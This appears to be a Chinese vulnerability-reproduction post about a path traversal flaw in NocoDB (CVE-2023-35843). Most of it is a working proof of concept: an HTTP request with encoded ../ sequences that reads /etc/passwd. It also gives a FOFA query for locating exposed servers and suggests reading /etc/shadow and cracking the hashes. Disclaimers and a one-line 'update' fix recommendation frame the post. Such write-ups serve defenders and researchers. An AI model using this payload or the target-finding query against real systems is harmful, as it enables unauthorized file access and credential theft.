前言
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
免责声明:
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
一:漏洞描述
NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。
二:漏洞影响版本
version<=0.106.1
三:网络空间测绘查询
fofa:
icon_hash="-2017596142"
四:漏洞复现
poc
GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
五:漏洞利用
可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作
六:修复建议
及时更新至最新版本
原文地址: https://www.freebuf.com/articles/web/379844.html
★
原文始发于微信公众号(渗透安全团队):【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论